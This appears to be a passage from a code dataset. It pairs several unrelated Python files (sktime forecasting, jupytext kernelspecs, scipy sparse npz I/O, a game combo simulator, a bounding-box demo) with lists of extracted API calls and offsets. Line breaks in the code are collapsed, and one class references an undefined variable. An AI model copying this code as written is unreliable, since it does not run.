"(YType.uint32, 'frr-holdtime')\n", (10619, 10649), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n')]
"""Series of actions that form a combo chain""" from __future__ import annotations from typing import Optional, Sequence, TYPE_CHECKING from action import Action from core.utility import Array from core.constants import PlayerForm, SimActKind, MomentType from core.database import FromDB if TYPE_CHECKING: from entity.player import Player class Combos: def __init__(self, player: Player, form: PlayerForm, act_ids: Sequence[int], ex_act_ids: Optional[Sequence[int]] = None) -> None: self.player = player self.actions: Array[Action] = Array() for idx, act_id in enumerate(act_ids): self.actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)) self.ex_actions = None if ex_act_ids: self.ex_actions: Array[Action] = Array() for idx, act_id in enumerate(ex_act_ids): if not act_id: self.ex_actions.append(None) continue self.ex_actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)) def next(self): if self.player.current in self.actions: try: return self.actions[self.player.current.index + 1] except IndexError: pass return self.actions[1] def __repr__(self) -> str: if self.ex_actions: return "->".join(map(repr, self.actions)) + "\tEX[" + "->".join(map(repr, self.ex_actions)) + "]" return "->".join(map(repr, self.actions)) class UniqueCombos(Combos, FromDB, table="CharaUniqueCombo"): def __init__(self, id: int, player: Player) -> None: FromDB.__init__(self, id) act_ids = (self._data["_ActionId"] + i for i in range(self._data["_MaxComboNum"])) ex_act_ids = None if not self._data["_ExActionId"] else (self._data["_ExActionId"] + i for i in range(self._data["_MaxComboNum"])) Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids) if self._data["_ShiftConditionType"] == 1: self.player.events.listen(MomentType.HIT, self.enable) def enable(self, *args, **kwargs): pass class DefaultCombos(Combos, FromDB, table="WeaponType"): def __init__(self, id: int, player: Player) -> None: FromDB.__init__(self, id) act_ids = (self._data[f"_DefaultSkill{i+1:02}"] for i in range(5) if self._data[f"_DefaultSkill{i+1:02}"]) ex_act_ids = None if not self._data["_DefaultSkill05Ex"] else (0, 0, 0, 0, self._data["_DefaultSkill05Ex"]) Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids) class DragonCombos(Combos): def __init__(self, id: int, combo_max: int, player: Player) -> None: act_ids = (id + i for i in range(combo_max)) Combos.__init__(self, player, PlayerForm.DRG, act_ids)
[ "core.utility.Array", "action.Action", "core.database.FromDB.__init__" ]
[((562, 569), 'core.utility.Array', 'Array', ([], {}), '()\n', (567, 569), False, 'from core.utility import Array\n'), ((1689, 1714), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (1704, 1714), False, 'from core.database import FromDB\n'), ((2326, 2351), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (2341, 2351), False, 'from core.database import FromDB\n'), ((821, 828), 'core.utility.Array', 'Array', ([], {}), '()\n', (826, 828), False, 'from core.utility import Array\n'), ((649, 720), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (655, 720), False, 'from action import Action\n'), ((1031, 1102), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (1037, 1102), False, 'from action import Action\n')]
#!/usr/bin/env python3 -u # -*- coding: utf-8 -*- __author__ = ["<NAME>"] __all__ = ["_StatsModelsAdapter"] import numpy as np import pandas as pd from sktime.forecasting.base._base import DEFAULT_ALPHA from sktime.forecasting.base._sktime import _OptionalForecastingHorizonMixin from sktime.forecasting.base._sktime import _SktimeForecaster class _StatsModelsAdapter(_OptionalForecastingHorizonMixin, _SktimeForecaster): """Base class for interfacing statsmodels forecasting algorithms""" _fitted_param_names = () def __init__(self): self._forecaster = None self._fitted_forecaster = None super(_StatsModelsAdapter, self).__init__() def fit(self, y, X=None, fh=None): """Fit to training data. Parameters ---------- y : pd.Series Target time series to which to fit the forecaster. fh : int, list or np.array, optional (default=None) The forecasters horizon with the steps ahead to to predict. X : pd.DataFrame, optional (default=None) Exogenous variables are ignored Returns ------- self : returns an instance of self. """ # statsmodels does not support the pd.Int64Index as required, # so we coerce them here to pd.RangeIndex if isinstance(y, pd.Series) and type(y.index) == pd.Int64Index: y, X = _coerce_int_to_range_index(y, X) self._set_y_X(y, X) self._set_fh(fh) self._fit_forecaster(y, X) self._is_fitted = True return self def _fit_forecaster(self, y_train, X_train=None): """Internal fit""" raise NotImplementedError("abstract method") def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA): """ Make forecasts. Parameters ---------- fh : ForecastingHorizon The forecasters horizon with the steps ahead to to predict. Default is one-step ahead forecast, i.e. np.array([1]) X : pd.DataFrame, optional (default=None) Exogenous variables are ignored. return_pred_int : bool, optional (default=False) alpha : int or list, optional (default=0.95) Returns ------- y_pred : pd.Series Returns series of predicted values. """ if return_pred_int: raise NotImplementedError() # statsmodels requires zero-based indexing starting at the # beginning of the training series when passing integers start, end = fh.to_absolute_int(self._y.index[0], self.cutoff)[[0, -1]] y_pred = self._fitted_forecaster.predict(start, end) # statsmodels forecasts all periods from start to end of forecasting # horizon, but only return given time points in forecasting horizon return y_pred.loc[fh.to_absolute(self.cutoff).to_pandas()] def get_fitted_params(self): """Get fitted parameters Returns ------- fitted_params : dict """ self.check_is_fitted() return { name: self._fitted_forecaster.params.get(name) for name in self._get_fitted_param_names() } def _get_fitted_param_names(self): """Get names of fitted parameters""" return self._fitted_param_names def _coerce_int_to_range_index(y, X=None): new_index = pd.RangeIndex(y.index[0], y.index[-1] + 1) try: np.testing.assert_array_equal(y.index, new_index) except AssertionError: raise ValueError( "Coercion of pd.Int64Index to pd.RangeIndex " "failed. Please provide `y_train` with a " "pd.RangeIndex." ) y.index = new_index if X is not None: X.index = new_index return y, X
[ "numpy.testing.assert_array_equal", "pandas.RangeIndex" ]
[((3433, 3475), 'pandas.RangeIndex', 'pd.RangeIndex', (['y.index[0]', '(y.index[-1] + 1)'], {}), '(y.index[0], y.index[-1] + 1)\n', (3446, 3475), True, 'import pandas as pd\n'), ((3493, 3542), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y.index', 'new_index'], {}), '(y.index, new_index)\n', (3522, 3542), True, 'import numpy as np\n')]
"""Find kernel specifications for a given language""" import os import sys from .languages import same_language from .reraise import reraise try: # I prefer not to take a dependency on jupyter_client from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec except ImportError as err: find_kernel_specs = reraise(err) get_kernel_spec = reraise(err) def set_kernelspec_from_language(notebook): """Set the kernel specification based on the 'main_language' metadata""" language = notebook.metadata.get("jupytext", {}).get("main_language") if "kernelspec" not in notebook.metadata and language: try: kernelspec = kernelspec_from_language(language) except ValueError: return notebook.metadata["kernelspec"] = kernelspec notebook.metadata.get("jupytext", {}).pop("main_language") def kernelspec_from_language(language): """Return the python kernel that matches the current env, or the first kernel that matches the given language""" if language == "python": # Return the kernel that matches the current Python executable for name in find_kernel_specs(): kernel_specs = get_kernel_spec(name) cmd = kernel_specs.argv[0] if ( kernel_specs.language == "python" and os.path.isfile(cmd) and os.path.samefile(cmd, sys.executable) ): return { "name": name, "language": language, "display_name": kernel_specs.display_name, } raise ValueError( "No kernel found that matches the current python executable {}\n".format( sys.executable ) + "Install one with 'python -m ipykernel install --name kernel_name [--user]'" ) for name in find_kernel_specs(): kernel_specs = get_kernel_spec(name) if same_language(kernel_specs.language, language): return { "name": name, "language": language, "display_name": kernel_specs.display_name, } raise ValueError("No kernel found for the language {}".format(language))
[ "jupyter_client.kernelspec.find_kernel_specs", "jupyter_client.kernelspec.get_kernel_spec", "os.path.samefile", "os.path.isfile" ]
[((1903, 1922), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1920, 1922), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1157, 1176), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1174, 1176), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1947, 1968), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1962, 1968), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1205, 1226), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1220, 1226), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1353, 1372), 'os.path.isfile', 'os.path.isfile', (['cmd'], {}), '(cmd)\n', (1367, 1372), False, 'import os\n'), ((1393, 1430), 'os.path.samefile', 'os.path.samefile', (['cmd', 'sys.executable'], {}), '(cmd, sys.executable)\n', (1409, 1430), False, 'import os\n')]
import numpy as np import scipy.sparse __all__ = ['save_npz', 'load_npz'] # Make loading safe vs. malicious input PICKLE_KWARGS = dict(allow_pickle=False) def save_npz(file, matrix, compressed=True): """ Save a sparse matrix to a file using ``.npz`` format. Parameters ---------- file : str or file-like object Either the file name (string) or an open file (file-like object) where the data will be saved. If file is a string, the ``.npz`` extension will be appended to the file name if it is not already there. matrix: spmatrix (format: ``csc``, ``csr``, ``bsr``, ``dia`` or coo``) The sparse matrix to save. compressed : bool, optional Allow compressing the file. Default: True See Also -------- scipy.sparse.load_npz: Load a sparse matrix from a file using ``.npz`` format. numpy.savez: Save several arrays into a ``.npz`` archive. numpy.savez_compressed : Save several arrays into a compressed ``.npz`` archive. Examples -------- Store sparse matrix to disk, and load it again: >>> import scipy.sparse >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]])) >>> sparse_matrix <2x3 sparse matrix of type '<class 'numpy.int64'>' with 2 stored elements in Compressed Sparse Column format> >>> sparse_matrix.todense() matrix([[0, 0, 3], [4, 0, 0]], dtype=int64) >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix) >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz') >>> sparse_matrix <2x3 sparse matrix of type '<class 'numpy.int64'>' with 2 stored elements in Compressed Sparse Column format> >>> sparse_matrix.todense() matrix([[0, 0, 3], [4, 0, 0]], dtype=int64) """ arrays_dict = {} if matrix.format in ('csc', 'csr', 'bsr'): arrays_dict.update(indices=matrix.indices, indptr=matrix.indptr) elif matrix.format == 'dia': arrays_dict.update(offsets=matrix.offsets) elif matrix.format == 'coo': arrays_dict.update(row=matrix.row, col=matrix.col) else: raise NotImplementedError('Save is not implemented for sparse matrix of format {}.'.format(matrix.format)) arrays_dict.update( format=matrix.format.encode('ascii'), shape=matrix.shape, data=matrix.data ) if compressed: np.savez_compressed(file, **arrays_dict) else: np.savez(file, **arrays_dict) def load_npz(file): """ Load a sparse matrix from a file using ``.npz`` format. Parameters ---------- file : str or file-like object Either the file name (string) or an open file (file-like object) where the data will be loaded. Returns ------- result : csc_matrix, csr_matrix, bsr_matrix, dia_matrix or coo_matrix A sparse matrix containing the loaded data. Raises ------ OSError If the input file does not exist or cannot be read. See Also -------- scipy.sparse.save_npz: Save a sparse matrix to a file using ``.npz`` format. numpy.load: Load several arrays from a ``.npz`` archive. Examples -------- Store sparse matrix to disk, and load it again: >>> import scipy.sparse >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]])) >>> sparse_matrix <2x3 sparse matrix of type '<class 'numpy.int64'>' with 2 stored elements in Compressed Sparse Column format> >>> sparse_matrix.todense() matrix([[0, 0, 3], [4, 0, 0]], dtype=int64) >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix) >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz') >>> sparse_matrix <2x3 sparse matrix of type '<class 'numpy.int64'>' with 2 stored elements in Compressed Sparse Column format> >>> sparse_matrix.todense() matrix([[0, 0, 3], [4, 0, 0]], dtype=int64) """ with np.load(file, **PICKLE_KWARGS) as loaded: try: matrix_format = loaded['format'] except KeyError as e: raise ValueError('The file {} does not contain a sparse matrix.'.format(file)) from e matrix_format = matrix_format.item() if not isinstance(matrix_format, str): # Play safe with Python 2 vs 3 backward compatibility; # files saved with SciPy < 1.0.0 may contain unicode or bytes. matrix_format = matrix_format.decode('ascii') try: cls = getattr(scipy.sparse, '{}_matrix'.format(matrix_format)) except AttributeError as e: raise ValueError('Unknown matrix format "{}"'.format(matrix_format)) from e if matrix_format in ('csc', 'csr', 'bsr'): return cls((loaded['data'], loaded['indices'], loaded['indptr']), shape=loaded['shape']) elif matrix_format == 'dia': return cls((loaded['data'], loaded['offsets']), shape=loaded['shape']) elif matrix_format == 'coo': return cls((loaded['data'], (loaded['row'], loaded['col'])), shape=loaded['shape']) else: raise NotImplementedError('Load is not implemented for ' 'sparse matrix of format {}.'.format(matrix_format))
[ "numpy.savez_compressed", "numpy.load", "numpy.savez" ]
[((2426, 2466), 'numpy.savez_compressed', 'np.savez_compressed', (['file'], {}), '(file, **arrays_dict)\n', (2445, 2466), True, 'import numpy as np\n'), ((2485, 2514), 'numpy.savez', 'np.savez', (['file'], {}), '(file, **arrays_dict)\n', (2493, 2514), True, 'import numpy as np\n'), ((4018, 4048), 'numpy.load', 'np.load', (['file'], {}), '(file, **PICKLE_KWARGS)\n', (4025, 4048), True, 'import numpy as np\n')]
# Copyright 2022 Collate # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ TestCase builder """ from metadata.generated.schema.api.tests.createTableTest import CreateTableTestRequest from metadata.generated.schema.tests.table import tableRowCountToEqual from metadata.generated.schema.tests.tableTest import TableTestType from metadata.great_expectations.builders.table.base_table_test_builders import ( BaseTableTestBuilder, ) class TableRowCountToEqualBuilder(BaseTableTestBuilder): """Builder for `expect_table_row_count_to_equal` GE expectation""" def _build_test(self) -> CreateTableTestRequest: """Specific test builder for the test""" return self.build_test_request( config=tableRowCountToEqual.TableRowCountToEqual( value=self.result["expectation_config"]["kwargs"]["value"], ), test_type=TableTestType.tableRowCountToEqual, )
[ "metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual" ]
[((1225, 1331), 'metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual', 'tableRowCountToEqual.TableRowCountToEqual', ([], {'value': "self.result['expectation_config']['kwargs']['value']"}), "(value=self.result[\n 'expectation_config']['kwargs']['value'])\n", (1266, 1331), False, 'from metadata.generated.schema.tests.table import tableRowCountToEqual\n')]
''' This code is based on https://github.com/jrieke/shape-detection/ ''' import matplotlib.pyplot as plt import matplotlib import numpy as np import tensorflow as tf import datetime class JriekeBboxDataset: def generate(self): print('Generating...') self.WIDTH = 8 self.HEIGHT = 8 num_imgs = 50000 min_object_size = 1 max_object_size = 4 num_objects = 1 self.bboxes = np.zeros((num_imgs, num_objects, 4)) self.imgs = np.zeros((num_imgs, self.WIDTH, self.HEIGHT)) # set background to 0 for i_img in range(num_imgs): for i_object in range(num_objects): w, h = np.random.randint(min_object_size, max_object_size, size=2) x = np.random.randint(0, self.WIDTH - w) y = np.random.randint(0, self.HEIGHT - h) self.imgs[i_img, y:y+h, x:x+w] = 1. # set rectangle to 1 self.bboxes[i_img, i_object] = [x, y, w, h] print("Shapes: imgs ", self.imgs.shape, " bboxes ", self.bboxes.shape) #why this? # X = (self.imgs.reshape(num_imgs, -1) - np.mean(self.imgs)) / np.std(self.imgs) X = self.imgs y = self.bboxes.reshape(num_imgs, -1) / self.WIDTH # Split training and test. i = int(0.8 * num_imgs) train_X = X[:i] #80% for training test_X = X[i:] train_y = y[:i] test_y = y[i:] self.test_imgs = self.imgs[i:] self.test_bboxes = self.bboxes[i:] return train_X, train_y, test_X, test_y def check_dataset_image_compability(self, test_X_sample, test_imgs_sample): fig = plt.figure(figsize=(12, 3)) fig.suptitle('check if the generated imgs match to the test_X slice image') fig.subplots_adjust(top=0.85) plt.subplot(1, 2, 1) plt.gca().set_title('Returned by the dataset class: used for training') plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT]) plt.subplot(1, 2, 2) plt.gca().set_title('Global image holder: used for plotting.') plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT]) plt.show() print('compare:',TMP,test_imgs_sample) def IOU(self,bbox1, bbox2): '''Calculate overlap between two bounding boxes [x, y, w, h] as the area of intersection over the area of unity''' x1, y1, w1, h1 = bbox1[0], bbox1[1], bbox1[2], bbox1[3] x2, y2, w2, h2 = bbox2[0], bbox2[1], bbox2[2], bbox2[3] w_I = min(x1 + w1, x2 + w2) - max(x1, x2) h_I = min(y1 + h1, y2 + h2) - max(y1, y2) if w_I <= 0 or h_I <= 0: # no overlap return 0. I = w_I * h_I U = w1 * h1 + w2 * h2 - I return I / U def convertDefaultAnnotToCoord(self, annot): ''' annot -> [x, y, w, h] ''' w = annot[2] * self.WIDTH h = annot[3] * self.HEIGHT x = annot[0] * self.HEIGHT y = annot[1] * self.HEIGHT return [x,y,w,h] def convertYoloAnnotToCoord(self, yolo_annot): ''' yolo_annot -> [x, y, w, h] ''' w = yolo_annot[2] * self.WIDTH h = yolo_annot[3] * self.HEIGHT x = (yolo_annot[0] * self.WIDTH) - (w/2) y = (yolo_annot[1] * self.HEIGHT) - (h/2) return [x,y,w,h] def show_generated(self, i=0): fig = plt.figure() fig.subplots_adjust(top=0.85) fig.suptitle('Generated image sample + GT') plt.imshow(self.imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT]) for bbox in self.bboxes[i]: plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none')) plt.gca().legend(['GT']) plt.show() def plot_rectangle(self, img, bbox): fig = plt.figure() fig.suptitle('Plotting rectangle.') fig.subplots_adjust(top=0.85) plt.subplot(1, 1, 1) plt.imshow(img, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT]) plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none')) plt.show() def check_dataset_image_compability(self, test_X_sample, test_imgs_sample): fig = plt.figure(figsize=(12, 3)) fig.suptitle('check if the generated imgs match to the test_X slice image') fig.subplots_adjust(top=0.85) plt.subplot(1, 2, 1) plt.gca().set_title('Returned by the dataset class: used for training') plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT]) plt.subplot(1, 2, 2) plt.gca().set_title('Global image holder: used for plotting.') plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT]) plt.show() print('compare:',test_X_sample,test_imgs_sample) def show_predicted(self, pred_bboxes): # Show a few images and predicted bounding boxes from the test dataset. fig = plt.figure(figsize=(12, 3)) fig.subplots_adjust(top=0.85) fig.suptitle('Prediction demonstration. Random samples.') legend_plotted = False for i_subplot in range(1, 11): plt.subplot(1, 10, i_subplot) i = np.random.randint(len(pred_bboxes)) plt.imshow(self.test_imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT]) for pred_bbox, exp_bbox in zip(pred_bboxes[i], self.test_bboxes[i]): # print('before convertion: pred',pred_bbox, 'gt',exp_bbox) pred_bbox = self.convertDefaultAnnotToCoord(pred_bbox) # exp_bbox = self.convertDefaultAnnotToCoord(exp_bbox) print('after convertion: pred',pred_bbox, 'gt',exp_bbox) plt.gca().add_patch(matplotlib.patches.Rectangle((pred_bbox[0], pred_bbox[1]), pred_bbox[2], pred_bbox[3], ec='r', fc='none')) #gt plt.gca().add_patch(matplotlib.patches.Rectangle((exp_bbox[0], exp_bbox[1]), exp_bbox[2], exp_bbox[3], ec='b', fc='none')) plt.annotate('IOU: {:.2f}'.format(self.IOU(pred_bbox, exp_bbox)), (pred_bbox[0], pred_bbox[1]+pred_bbox[3]+0.2), color='r') if not legend_plotted: legend_plotted = True plt.gca().legend(['Pred','GT'],loc='upper center', bbox_to_anchor=(0.5, -0.5), fancybox=True) plt.show() # plt.savefig('plots/bw-single-rectangle_prediction_{0:%Y-%m-%d%H:%M:%S}.png'.format(datetime.datetime.now()), dpi=300)
[ "matplotlib.pyplot.imshow", "matplotlib.patches.Rectangle", "matplotlib.pyplot.gca", "numpy.zeros", "matplotlib.pyplot.figure", "numpy.random.randint", "matplotlib.pyplot.subplot", "matplotlib.pyplot.show" ]
[((440, 476), 'numpy.zeros', 'np.zeros', (['(num_imgs, num_objects, 4)'], {}), '((num_imgs, num_objects, 4))\n', (448, 476), True, 'import numpy as np\n'), ((497, 542), 'numpy.zeros', 'np.zeros', (['(num_imgs, self.WIDTH, self.HEIGHT)'], {}), '((num_imgs, self.WIDTH, self.HEIGHT))\n', (505, 542), True, 'import numpy as np\n'), ((1662, 1689), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (1672, 1689), True, 'import matplotlib.pyplot as plt\n'), ((1821, 1841), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (1832, 1841), True, 'import matplotlib.pyplot as plt\n'), ((1930, 2052), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (1940, 2052), True, 'import matplotlib.pyplot as plt\n'), ((2057, 2077), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (2068, 2077), True, 'import matplotlib.pyplot as plt\n'), ((2157, 2282), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (2167, 2282), True, 'import matplotlib.pyplot as plt\n'), ((2286, 2296), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2294, 2296), True, 'import matplotlib.pyplot as plt\n'), ((3515, 3527), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3525, 3527), True, 'import matplotlib.pyplot as plt\n'), ((3626, 3746), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.imgs[i], cmap='Greys', interpolation='none', origin='lower',\n extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (3636, 3746), True, 'import matplotlib.pyplot as plt\n'), ((3943, 3953), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3951, 3953), True, 'import matplotlib.pyplot as plt\n'), ((4011, 4023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4021, 4023), True, 'import matplotlib.pyplot as plt\n'), ((4115, 4135), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\n', (4126, 4135), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4256), 'matplotlib.pyplot.imshow', 'plt.imshow', (['img'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(img, cmap='Greys', interpolation='none', origin='lower', extent=\n [0, self.WIDTH, 0, self.HEIGHT])\n", (4154, 4256), True, 'import matplotlib.pyplot as plt\n'), ((4375, 4385), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4383, 4385), True, 'import matplotlib.pyplot as plt\n'), ((4481, 4508), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (4491, 4508), True, 'import matplotlib.pyplot as plt\n'), ((4640, 4660), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (4651, 4660), True, 'import matplotlib.pyplot as plt\n'), ((4749, 4871), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4759, 4871), True, 'import matplotlib.pyplot as plt\n'), ((4876, 4896), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (4887, 4896), True, 'import matplotlib.pyplot as plt\n'), ((4976, 5101), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4986, 5101), True, 'import matplotlib.pyplot as plt\n'), ((5105, 5115), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5113, 5115), True, 'import matplotlib.pyplot as plt\n'), ((5312, 5339), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (5322, 5339), True, 'import matplotlib.pyplot as plt\n'), ((6760, 6770), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6768, 6770), True, 'import matplotlib.pyplot as plt\n'), ((4280, 4369), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\n fc='none')\n", (4308, 4369), False, 'import matplotlib\n'), ((5527, 5556), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(10)', 'i_subplot'], {}), '(1, 10, i_subplot)\n', (5538, 5556), True, 'import matplotlib.pyplot as plt\n'), ((5621, 5747), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.test_imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.test_imgs[i], cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (5631, 5747), True, 'import matplotlib.pyplot as plt\n'), ((676, 735), 'numpy.random.randint', 'np.random.randint', (['min_object_size', 'max_object_size'], {'size': '(2)'}), '(min_object_size, max_object_size, size=2)\n', (693, 735), True, 'import numpy as np\n'), ((756, 792), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.WIDTH - w)'], {}), '(0, self.WIDTH - w)\n', (773, 792), True, 'import numpy as np\n'), ((813, 850), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.HEIGHT - h)'], {}), '(0, self.HEIGHT - h)\n', (830, 850), True, 'import numpy as np\n'), ((1850, 1859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1857, 1859), True, 'import matplotlib.pyplot as plt\n'), ((2086, 2095), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2093, 2095), True, 'import matplotlib.pyplot as plt\n'), ((3811, 3900), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\n fc='none')\n", (3839, 3900), False, 'import matplotlib\n'), ((4260, 4269), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4267, 4269), True, 'import matplotlib.pyplot as plt\n'), ((4669, 4678), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4676, 4678), True, 'import matplotlib.pyplot as plt\n'), ((4905, 4914), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4912, 4914), True, 'import matplotlib.pyplot as plt\n'), ((3791, 3800), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3798, 3800), True, 'import matplotlib.pyplot as plt\n'), ((3910, 3919), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3917, 3919), True, 'import matplotlib.pyplot as plt\n'), ((6151, 6260), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(pred_bbox[0], pred_bbox[1])', 'pred_bbox[2]', 'pred_bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((pred_bbox[0], pred_bbox[1]), pred_bbox[2],\n pred_bbox[3], 